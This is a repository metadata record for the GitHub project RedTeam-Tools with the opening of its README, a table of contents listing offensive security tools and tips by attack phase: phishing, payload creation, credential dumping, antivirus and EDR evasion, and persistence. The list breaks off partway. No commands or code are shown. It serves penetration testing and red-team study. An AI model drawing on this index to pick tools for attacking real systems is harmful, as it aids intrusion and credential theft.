{"id":13510470,"url":"https://github.com/A-poc/RedTeam-Tools","last_synced_at":"2025-03-30T16:33:38.394Z","repository":{"id":61263360,"uuid":"538444958","full_name":"A-poc/RedTeam-Tools","owner":"A-poc","description":"Tools and Techniques for Red Team / Penetration Testing","archived":false,"fork":false,"pushed_at":"2023-08-08T20:30:03.000Z","size":218,"stargazers_count":5958,"open_issues_count":0,"forks_count":814,"subscribers_count":99,"default_branch":"main","last_synced_at":"2024-10-29T15:34:14.538Z","etag":null,"topics":["cheatsheet","cybersecurity","enumeration","hacking","linux","mitre-attack","payload","penetration-testing","pentest","pentest-tools","red-team","red-team-tools","redteam","resources","security-tools","tools","windows"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/A-poc.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2022-09-19T10:20:29.000Z","updated_at":"2024-10-29T10:22:25.000Z","dependencies_parsed_at":"2024-01-29T09:19:18.788Z","dependency_job_id":"98420409-f285-4e27-804a-bdde22e37db5","html_url":"https://github.com/A-poc/RedTeam-Tools","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/A-poc%2FRedTeam-Tools","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/A-poc%2FRedTeam-Tools/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/A-poc%2FRedTeam-Tools/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/rep
ositories/A-poc%2FRedTeam-Tools/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/A-poc","download_url":"https://codeload.github.com/A-poc/RedTeam-Tools/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222566739,"owners_count":17004237,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cheatsheet","cybersecurity","enumeration","hacking","linux","mitre-attack","payload","penetration-testing","pentest","pentest-tools","red-team","red-team-tools","redteam","resources","security-tools","tools","windows"],"created_at":"2024-08-01T02:01:40.394Z","updated_at":"2025-03-30T16:33:38.364Z","avatar_url":"https://github.com/A-poc.png","language":null,"readme":"# RedTeam-Tools\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210680426-20a92131-56f9-43ad-be82-f449e3215dda.png\" height=\"300\"\u003e\n\u003c/p\u003e\n\nThis github repository contains a collection of **150+** **tools** and **resources** that can be useful for **red teaming activities**. \n\nSome of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.\n\n\u003e 🔗 If you are a Blue Teamer, check out [BlueTeam-Tools](https://github.com/A-poc/BlueTeam-Tools)\n\n\u003e **Warning** \n\u003e \n\u003e *The materials in this repository are for informational and educational purposes only. 
They are not intended for use in any illegal activities.*\n\n\u003e **Note** \n\u003e \n\u003e *Hide Tool List headings with the arrow.*\n\u003e \n\u003e *Click 🔙 to get back to the list.*\n\n# Tool List\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eRed Team Tips\u003c/b\u003e 19 tips\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n        \t\u003cli\u003e\u003cb\u003e\u003ca href=\"#improved-html-smuggling-with-mouse-move-eventlistener\"\u003eImproved HTML smuggling with mouse move eventlistener\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @pr0xylife\u003c/i\u003e\u003c/li\u003e\n        \t\u003cli\u003e\u003cb\u003e\u003ca href=\"#google-translate-for-phishing\"\u003eGoogle translate for phishing\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @malmoeb\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#hiding-the-local-admin-account\"\u003eHiding the local admin account\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#cripple-windows-defender-by-deleting-signatures\"\u003eCripple windows defender by deleting signatures\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#enable-multiple-rdp-sessions-per-user\"\u003eEnable multiple RDP sessions per user\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#sysinternals-psexecexe-local-alternative\"\u003eSysinternals PsExec.exe local alternative\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @GuhnooPlusLinux\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#live-off-the-land-port-scanner\"\u003eLive off the land port scanner\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca 
href=\"#proxy-aware-powershell-downloadstring\"\u003eProxy aware PowerShell DownloadString\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#looking-for-internal-endpoints-in-browser-bookmarks\"\u003eLooking for internal endpoints in browser bookmarks\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#query-dns-records-for-enumeration\"\u003eQuery DNS records for enumeration\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#unquoted-service-paths-without-powerup\"\u003eUnquoted service paths without PowerUp\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#bypass-a-disabled-command-prompt-with-k\"\u003eBypass a disabled command prompt with /k\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Martin Sohn Christensen\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#stop-windows-defender-deleting-mimikatzexe\"\u003eStop windows defender deleting mimikatz.exe\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @GuhnooPlusLinux\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#check-if-you-are-in-a-virtual-machine\"\u003eCheck if you are in a virtual machine\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @dmcxblue\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#enumerate-applocker-rules\"\u003eEnumerate AppLocker rules\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#cmd-shortcut-with-6-pixels-via-mspaint\"\u003eCMD shortcut with 6 pixels via mspaint\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PenTestPartners\u003c/i\u003e\u003c/li\u003e\n            
\u003cli\u003e\u003cb\u003e\u003ca href=\"#link-spoofing-with-preventdefault-javascript-method\"\u003eLink spoofing with PreventDefault JavaScript method\u003c/a\u003e\u003c/b\u003e\u003ci\u003e \u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#check-smb-firewall-rules-with-responder\"\u003eCheck SMB firewall rules with Responder\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @malmoeb\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#disable-av-with-sysinternals-pssuspend\"\u003eDisable AV with SysInternals PsSuspend\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @0gtweet\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e        \n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eReconnaissance\u003c/b\u003e 24 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#spiderfoot\"\u003espiderfoot\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Automated OSINT and attack surface mapping\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#reconftw\"\u003ereconftw\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Automated subdomain and vulnerability recon tool\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#subzy\"\u003esubzy\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Subdomain takeover vulnerability checker\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#smtp-user-enum\"\u003esmtp-user-enum\u003c/a\u003e\u003c/b\u003e\u003ci\u003e SMTP user enumeration\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#crtsh---httprobe---eyewitness\"\u003ecrt.sh -\u003e httprobe -\u003e EyeWitness\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Automated domain screenshotting\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca 
href=\"#jsendpoints\"\u003ejsendpoints\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Extract page DOM links\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#nuclei\"\u003enuclei\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Vulnerability scanner\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#certsniff\"\u003ecertSniff\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Certificate transparency log keyword sniffer\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#gobuster\"\u003egobuster\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Website path brute force\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#feroxbuster\"\u003eferoxbuster\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Fast content discovery tool written in Rust\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#cloudbrute\"\u003eCloudBrute\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Cloud infrastructure brute force\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#dnsrecon\"\u003ednsrecon\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Enumerate DNS records\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#shodanio\"\u003eShodan.io\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Public facing system knowledge base\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#aort\"\u003eAORT (All in One Recon Tool)\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Subdomain enumeration\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#spoofcheck\"\u003espoofcheck\u003c/a\u003e\u003c/b\u003e\u003ci\u003e SPF/DMARC record checker\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#awsbucketdump\"\u003eAWSBucketDump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e S3 bucket enumeration\u003c/i\u003e\u003c/li\u003e\n            
\u003cli\u003e\u003cb\u003e\u003ca href=\"#githarvester\"\u003eGitHarvester\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GitHub credential searcher\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#trufflehog\"\u003etruffleHog\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GitHub credential scanner\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#dismap\"\u003eDismap\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Asset discovery/identification\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#enum4linux\"\u003eenum4linux\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows/samba enumeration\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#skanuvaty\"\u003eskanuvaty\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Dangerously fast dns/network/port scanner\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#metabigor\"\u003eMetabigor\u003c/a\u003e\u003c/b\u003e\u003ci\u003e OSINT tool without API\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#gitrob\"\u003eGitrob\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GitHub sensitive information scanner\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#gowitness\"\u003egowitness\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Web screenshot utility using Chrome Headless\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eResource Development\u003c/b\u003e 12 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#remoteinjector\"\u003eremoteinjector\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Inject remote template link into word document\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca 
href=\"#chimera\"\u003eChimera\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell obfuscation\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#msfvenom\"\u003emsfvenom\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Payload creation\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#shellter\"\u003eShellter\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Dynamic shellcode injection tool\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#freeze\"\u003eFreeze\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Payload creation (circumventing EDR)\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#wordsteal\"\u003eWordSteal\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Steal NTLM hashes with Microsoft Word\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#ntapi-undocumented-functions\"\u003eNTAPI Undocumented Functions\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows NT Kernel, Native API and drivers\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#kernel-callback-functions\"\u003eKernel Callback Functions\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Undocumented Windows APIs\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#offensivevba\"\u003eOffensiveVBA\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Office macro code execution and evasion techniques\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#wsh\"\u003eWSH\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Wsh payload\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#hta\"\u003eHTA\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Hta payload\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#vba\"\u003eVBA\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Vba payload\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    
\u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eInitial Access\u003c/b\u003e 10 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#credmaster\"\u003eCredMaster\u003c/a\u003e\u003c/b\u003e\u003ci\u003e CredKing password spraying tool\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#trevorspray\"\u003eTREVORspray\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Password sprayer with threading\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#evilqr\"\u003eevilqr\u003c/a\u003e\u003c/b\u003e\u003ci\u003e QRLJacking phishing PoC\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#cupp\"\u003eCUPP\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Common User Passwords Profiler (CUPP)\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#bash-bunny\"\u003eBash Bunny\u003c/a\u003e\u003c/b\u003e\u003ci\u003e USB attack tool\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#evilgophish\"\u003eEvilGoPhish\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Phishing campaign framework\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#social-engineer-toolkit-set\"\u003eThe Social-Engineer Toolkit\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Phishing campaign framework\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#hydra\"\u003eHydra\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Brute force tool\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#squarephish\"\u003eSquarePhish\u003c/a\u003e\u003c/b\u003e\u003ci\u003e OAuth/QR code phishing framework\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#king-phisher\"\u003eKing Phisher\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Phishing 
campaign framework\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eExecution\u003c/b\u003e 13 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#responder\"\u003eResponder\u003c/a\u003e\u003c/b\u003e\u003ci\u003e LLMNR, NBT-NS and MDNS poisoner\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#secretsdump\"\u003esecretsdump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Remote hash dumper\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#evil-winrm\"\u003eevil-winrm\u003c/a\u003e\u003c/b\u003e\u003ci\u003e WinRM shell\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#donut\"\u003eDonut\u003c/a\u003e\u003c/b\u003e\u003ci\u003e In-memory .NET execution\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#macro_pack\"\u003eMacro_pack\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Macro obfuscation\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#powersploit\"\u003ePowerSploit\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell script suite\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#rubeus\"\u003eRubeus\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory hack tool\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpup\"\u003eSharpUp\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows vulnerability identifier\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#sqlrecon\"\u003eSQLRecon\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Offensive MS-SQL toolkit\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca 
href=\"#ultimateapplockerbypasslist\"\u003eUltimateAppLockerByPassList\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Common AppLocker Bypass Techniques\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#starfighters\"\u003eStarFighters\u003c/a\u003e\u003c/b\u003e\u003ci\u003e JavaScript and VBScript Based Empire Launcher\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#demiguise\"\u003edemiguise\u003c/a\u003e\u003c/b\u003e\u003ci\u003e HTA encryption tool\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#powerzure\"\u003ePowerZure\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell framework to assess Azure security\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003ePersistence\u003c/b\u003e 4 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#impacket\"\u003eImpacket\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Python script suite\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#empire\"\u003eEmpire\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Post-exploitation framework\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpersist\"\u003eSharPersist\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows persistence toolkit\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#ligolo-ng\"\u003eligolo-ng\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Tunneling tool that uses a TUN interface\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003ePrivilege Escalation\u003c/b\u003e 11 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca 
href=\"#crassus\"\u003eCrassus\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows privilege escalation discovery tool\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#linpeas\"\u003eLinPEAS\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Linux privilege escalation\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#winpeas\"\u003eWinPEAS\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows privilege escalation\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#linux-smart-enumeration\"\u003elinux-smart-enumeration\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Linux privilege escalation\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#certify\"\u003eCertify\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory privilege escalation\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#get-gpppassword\"\u003eGet-GPPPassword\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows password extraction\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#sherlock\"\u003eSherlock\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell privilege escalation tool\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#watson\"\u003eWatson\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows privilege escalation tool\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#impulsivedllhijack\"\u003eImpulsiveDLLHijack\u003c/a\u003e\u003c/b\u003e\u003ci\u003e DLL Hijack tool\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#adfsdump\"\u003eADFSDump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e AD FS dump tool\u003c/i\u003e\u003c/li\u003e \n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#beroot\"\u003eBeRoot\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Multi OS Privilege Escalation Project\u003c/i\u003e\u003c/li\u003e\n   
     \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eDefense Evasion\u003c/b\u003e 8 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#invoke-obfuscation\"\u003eInvoke-Obfuscation\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Script obfuscator\u003c/i\u003e\u003c/li\u003e\n\t        \u003cli\u003e\u003cb\u003e\u003ca href=\"#veil\"\u003eVeil\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Metasploit payload obfuscator\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpblock\"\u003eSharpBlock\u003c/a\u003e\u003c/b\u003e\u003ci\u003e EDR bypass via entry point execution prevention\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#alcatraz\"\u003eAlcatraz\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GUI x64 binary obfuscator\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#mangle\"\u003eMangle\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Compiled executable manipulation\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#amsi-fail\"\u003eAMSI Fail\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell snippets that break or disable AMSI\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#scarecrow\"\u003eScareCrow\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Payload creation framework designed around EDR bypass\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#moonwalk\"\u003emoonwalk\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Linux system log and filesystem timestamp remover\u003c/i\u003e\u003c/li\u003e\n        \u003c/ul\u003e\n    \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n    \u003csummary\u003e\u003cb\u003eCredential Access\u003c/b\u003e 11 tools\u003c/summary\u003e\n    \u003cul\u003e\n        \u003cul\u003e\n  
          \u003cli\u003e\u003cb\u003e\u003ca href=\"#mimikatz\"\u003eMimikatz\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows credential extractor\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#lazagne\"\u003eLaZagne\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Local password extractor\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#hashcat\"\u003ehashcat\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Password hash cracking\u003c/i\u003e\u003c/li\u003e\n            \u003cli\u003e\u003cb\u003e\u003ca href=\"#john-the-ripper\"\u003eJohn the Ripper\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Password hash cracking\u003c/i\u003e\u003c/li\u003e\n\t        \u003cli\u003e\u003cb\u003e\u003ca href=\"#scomdecrypt\"\u003eSCOMDecrypt\u003c/a\u003e\u003c/b\u003e\u003ci\u003e SCOM Credential Decryption Tool\u003c/i\u003e\u003c/li\u003e\n\t        \u003cli\u003e\u003cb\u003e\u003ca href=\"#nanodump\"\u003enanodump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e LSASS process minidump creation\u003c/i\u003e\u003c/li\u003e\n\t        \u003cli\u003e\u003cb\u003e\u003ca 